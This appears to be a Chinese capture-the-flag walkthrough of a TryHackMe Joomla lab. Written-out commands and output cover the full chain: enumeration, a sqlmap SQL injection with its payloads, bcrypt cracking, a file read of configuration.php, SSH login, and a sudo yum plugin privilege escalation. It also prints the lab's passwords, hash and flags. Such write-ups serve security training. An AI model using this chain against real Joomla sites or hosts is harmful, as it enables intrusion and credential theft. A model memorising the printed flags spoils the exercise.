服务枚举
┌──(rootkali)-[~/tryhackme]└─# nmap -sV 10.10.36.72 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-02 05:45 EDTNmap scan report for 10.10.36.72Host is up (0.34s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4 (protocol 2.0)80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)3306/tcp open mysql MariaDB (unauthorized)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 21.94 seconds目录爆破
──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -u "http://10.10.36.72" -e* -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -t 100 _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521Error Log: /root/dirsearch/logs/errors-21-09-02_05-48-23.logTarget: http://10.10.36.72[05:48:23] Starting: [05:48:25] 200 - 9KB - /[05:48:25] 301 - 234B - /images -> http://10.10.36.72/images/[05:48:26] 301 - 235B - /modules -> http://10.10.36.72/modules/[05:48:31] 301 - 237B - /templates -> http://10.10.36.72/templates/[05:48:31] 301 - 233B - /media -> http://10.10.36.72/media/[05:48:31] 301 - 231B - /bin -> http://10.10.36.72/bin/[05:48:31] 301 - 235B - /plugins -> http://10.10.36.72/plugins/[05:48:32] 301 - 236B - /includes -> http://10.10.36.72/includes/[05:48:33] 301 - 236B - /language -> http://10.10.36.72/language/[05:48:33] 301 - 238B - /components -> http://10.10.36.72/components/[05:48:33] 301 - 233B - /cache -> http://10.10.36.72/cache/[05:48:34] 301 - 237B - /libraries -> http://10.10.36.72/libraries/[05:48:41] 301 - 231B - /tmp -> http://10.10.36.72/tmp/[05:48:42] 301 - 235B - /layouts -> http://10.10.36.72/layouts/[05:48:49] 301 - 241B - /administrator -> http://10.10.36.72/administrator/[05:49:43] 301 - 231B - /cli -> http://10.10.36.72/cli/ Task Completed存在robots.txt文件,泄露相干文件夹,与爆破进去的基本一致
# If the Joomla site is installed within a folder # eg www.example.com/joomla/ then the robots.txt file # MUST be moved to the site root # eg www.example.com/robots.txt# AND the joomla folder name MUST be prefixed to all of the# paths. # eg the Disallow rule for the /administrator/ folder MUST # be changed to read # Disallow: /joomla/administrator/## For more information about the robots.txt standard, see:# http://www.robotstxt.org/orig.html## For syntax checking, see:# http://tool.motoricerca.info/robots-checker.phtmlUser-agent: *Disallow: /administrator/Disallow: /bin/Disallow: /cache/Disallow: /cli/Disallow: /components/Disallow: /includes/Disallow: /installation/Disallow: /language/Disallow: /layouts/Disallow: /libraries/Disallow: /logs/Disallow: /modules/Disallow: /plugins/Disallow: /tmp/用msf探测版本
──(rootkali)-[~]└─# msfconsole -q 1 ⨯msf6 > use auxiliary/scanner/http/joomla_versionmsf6 auxiliary(scanner/http/joomla_version) > optionsModule options (auxiliary/scanner/http/joomla_version): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the Joomla application THREADS 1 yes The number of concurrent threads (max one per host) VHOST no HTTP server virtual hostmsf6 auxiliary(scanner/http/joomla_version) > set rhosts 10.10.36.72rhosts => 10.10.36.72msf6 auxiliary(scanner/http/joomla_version) > run[*] Server: Apache/2.4.6 (CentOS) PHP/5.6.40[+] Joomla version: 3.7.0[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed失去cms版本
Joomla version: 3.7.0
question:What is the Joomla version?answer:3.7.0查问cms破绽,存在sql注入
┌──(rootkali)-[~]└─# searchsploit Joomla 3.7.0 130 ⨯---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txtJoomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | php/webapps/43488.txt---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results依据42033.txt,应用sqlmap注入
sqlmap -u "http://10.10.211.216/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --dump --batch
sqlmap identified the following injection point(s) with a total of 2711 HTTP(s) requests:---Parameter: list[fullordering] (GET) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9274 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(9274=9274,1))),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8067 FROM (SELECT(SLEEP(5)))BqBU)---[02:40:46] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOS 7web application technology: Apache 2.4.6, PHP 5.6.40back-end DBMS: MySQL >= 5.0 (MariaDB fork)[02:40:48] [INFO] fetching database names[02:40:49] [INFO] retrieved: 'information_schema'[02:40:49] [INFO] retrieved: 'joomla'[02:40:50] [INFO] retrieved: 'mysql'[02:40:50] [INFO] retrieved: 'performance_schema'[02:40:51] [INFO] retrieved: 'test'available databases [5]:[*] information_schema[*] joomla[*] mysql[*] performance_schema[*] test基于谬误,数据库joomla,列出所有数据表
sqlmap -u "http://10.10.211.216/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --dbms mysql --technique E -D joomla --tables --batch
[02:55:45] [INFO] fetching tables for database: 'joomla'Database: joomla[72 tables]+----------------------------+| #__assets || #__associations || #__banner_clients || #__banner_tracks || #__banners || #__categories || #__contact_details || #__content_frontpage || #__content_rating || #__content_types || #__content || #__contentitem_tag_map || #__core_log_searches || #__extensions || #__fields_categories || #__fields_groups || #__fields_values || #__fields || #__finder_filters || #__finder_links_terms0 || #__finder_links_terms1 || #__finder_links_terms2 || #__finder_links_terms3 || #__finder_links_terms4 || #__finder_links_terms5 || #__finder_links_terms6 || #__finder_links_terms7 || #__finder_links_terms8 || #__finder_links_terms9 || #__finder_links_termsa || #__finder_links_termsb || #__finder_links_termsc || #__finder_links_termsd || #__finder_links_termse || #__finder_links_termsf || #__finder_links || #__finder_taxonomy_map || #__finder_taxonomy || #__finder_terms_common || #__finder_terms || #__finder_tokens_aggregate || #__finder_tokens || #__finder_types || #__languages || #__menu_types || #__menu || #__messages_cfg || #__messages || #__modules_menu || #__modules || #__newsfeeds || #__overrider || #__postinstall_messages || #__redirect_links || #__schemas || #__session || #__tags || #__template_styles || #__ucm_base || #__ucm_content || #__ucm_history || #__update_sites_extensions || #__update_sites || #__updates || #__user_keys || #__user_notes || #__user_profiles || #__user_usergroup_map || #__usergroups || #__users || #__utf8_conversion || #__viewlevels |+----------------------------+列举所有#__users的数据
sqlmap -u "http://10.10.211.216/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --dbms mysql --technique E -D joomla -T "#__users" --columns -C username,password --dump --batch
[*] starting @ 03:42:08 /2021-09-03/[03:42:08] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.9) Gecko/20071105 Firefox/2.0.0.9' from file '/usr/share/sqlmap/data/txt/user-agents.txt'[03:42:08] [INFO] testing connection to the target URL[03:42:09] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the testsyou have not declared cookie(s), while server wants to set its own ('eaa83fe8b963ab08ce9ab7d4a798de05=fqucgm84oqt...koq73blf67'). Do you want to use those [Y/n] Ysqlmap resumed the following injection point(s) from stored session:---Parameter: list[fullordering] (GET) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9274 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(9274=9274,1))),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)---[03:42:09] [INFO] testing MySQL[03:42:09] [INFO] confirming MySQL[03:42:10] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOS 7web application technology: PHP 5.6.40, Apache 2.4.6back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)[03:42:10] [INFO] fetching columns 'password, username' for table '#__users' in database 'joomla'[03:42:10] [WARNING] unable to retrieve column names for table '#__users' in database 'joomla'do you want to use common column existence check? [y/N/q] N[03:42:10] [INFO] fetching entries of column(s) 'password,username' for table '#__users' in database 'joomla'[03:42:11] [INFO] retrieved: '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm'[03:42:12] [INFO] retrieved: 'jonah'Database: joomlaTable: #__users[1 entry]+----------+--------------------------------------------------------------+| username | password |+----------+--------------------------------------------------------------+| jonah | $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm |+----------+--------------------------------------------------------------+[03:42:12] [INFO] table 'joomla.`#__users`' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.211.216/dump/joomla/#__users.csv'[03:42:12] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 7 times[03:42:12] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.211.216'[03:42:12] [WARNING] your sqlmap version is outdated[*] ending @ 03:42:12 /2021-09-03/把jonah:$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm 写进hash.txt,用john破解
┌──(rootkali)-[~/tryhackme]
└─# john --format=bcrypt hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
记录一个john的坑
john的字典参数--wordlist,如果没有写"="号,有可能破解不进去(即:john --format=bcrypt hash.txt --wordlist /usr/share/wordlists/rockyou.txt)
详情参考这里:https://www.reddit.com/r/HowT...
查看破解的明码
└─# john --show hash.txt 1 ⨯
jonah:spiderman123
1 password hash cracked, 0 left
question:What is Jonah's cracked password?answer:spiderman123拿到初始shell
测试
sqlmap -u "http://10.10.49.149/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --dbms mysql --technique E --file-read /var/www/html/configuration.php --batch
读取/var/www/html/configuration.php。找到数据库账号密码,外网不可连贯
public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
读取/etc/passwd
root0:0:root:/root:/bin/bash
bin1:1:bin:/bin:/sbin/nologin
daemon2:2:daemon:/sbin:/sbin/nologin
adm3:4:adm:/var/adm:/sbin/nologin
lp4:7:lp:/var/spool/lpd:/sbin/nologin
sync5:0:sync:/sbin:/bin/sync
shutdown6:0:shutdown:/sbin:/sbin/shutdown
halt7:0:halt:/sbin:/sbin/halt
mail8:12:mail:/var/spool/mail:/sbin/nologin
operator11:0:operator:/root:/sbin/nologin
games12games:/usr/games:/sbin/nologin
ftp14:50:FTP User:/var/ftp:/sbin/nologin
nobody99:99:Nobody:/:/sbin/nologin
systemd-network192:192:systemd Network Management:/:/sbin/nologin
dbus81:81:System message bus:/:/sbin/nologin
polkitd999:998:User for polkitd:/:/sbin/nologin
sshd74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix89:89::/var/spool/postfix:/sbin/nologin
chrony998:996::/var/lib/chrony:/sbin/nologin
jjameson1000:1000:Jonah Jameson:/home/jjameson:/bin/bash
apache48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql27:27:MariaDB Server:/var/lib/my
利用 jjameson:nv5uz9r3ZEDzVjNu通过ssh登录零碎拿到初始shell
┌──(rootkali)-[~]└─# ssh jjameson@10.10.49.149 255 ⨯The authenticity of host '10.10.49.149 (10.10.49.149)' can't be established.ECDSA key fingerprint is SHA256:apAdD+3yApa9Kmt7Xum5WFyVFUHZm/dCR/uJyuuCi5g.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.49.149' (ECDSA) to the list of known hosts.jjameson@10.10.49.149's password: Last login: Mon Dec 16 05:14:55 2019 from netwars[jjameson@dailybugle ~]$ lsuser.txt[jjameson@dailybugle ~]$ cat user.txt27a260fe3cba712cfdedb1c86d80442e[jjameson@dailybugle ~]$ 拿到user.txt
question:What is the user flag?answer:27a260fe3cba712cfdedb1c86d80442e通过sudo -l 发现yum命令无需明码就能够用root身份运行
[jjameson@dailybugle ~]$ sudo -l匹配 %2$s 上 %1$s 的默认条目: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin用户 jjameson 能够在 dailybugle 上运行以下命令: (ALL) NOPASSWD: /usr/bin/yum依据https://gtfobins.github.io/gt...这里的b办法拿到root权限
[jjameson@dailybugle ~]$ TF=$(mktemp -d)[jjameson@dailybugle ~]$ echo 'id' > $TF/x.sh[jjameson@dailybugle ~]$ fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF-bash: fpm: 未找到命令[jjameson@dailybugle ~]$ at >$TF/x<<EOF> [main]> plugins=1> pluginpath=$TF> pluginconfpath=$TF> EOF-bash: at: 未找到命令[jjameson@dailybugle ~]$ TF=$(mktemp -d)[jjameson@dailybugle ~]$ cat >$TF/x<<EOF> [main]> plugins=1> pluginpath=$TF> pluginconfpath=$TF> EOF[jjameson@dailybugle ~]$ cat >$TF/y.conf<<EOF> [main]> enabled=1> EOF[jjameson@dailybugle ~]$ cat >$TF/y.py<<EOF> import os> import yum> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE> requires_api_version='2.1'> def init_hook(conduit):> os.execl('/bin/sh','/bin/sh')> EOF[jjameson@dailybugle ~]$ sudo yum -c $TF/x --enableplugin=y已加载插件:y没有匹配 y 的插件sh-4.2# iduid=0(root) gid=0(root) 组=0(root)sh-4.2# cat /root/root.txt eec3d53292b1821868266858d7fa6f79sh-4.2# 拿到root.txt
question:What is the root flag?answer:eec3d53292b1821868266858d7fa6f79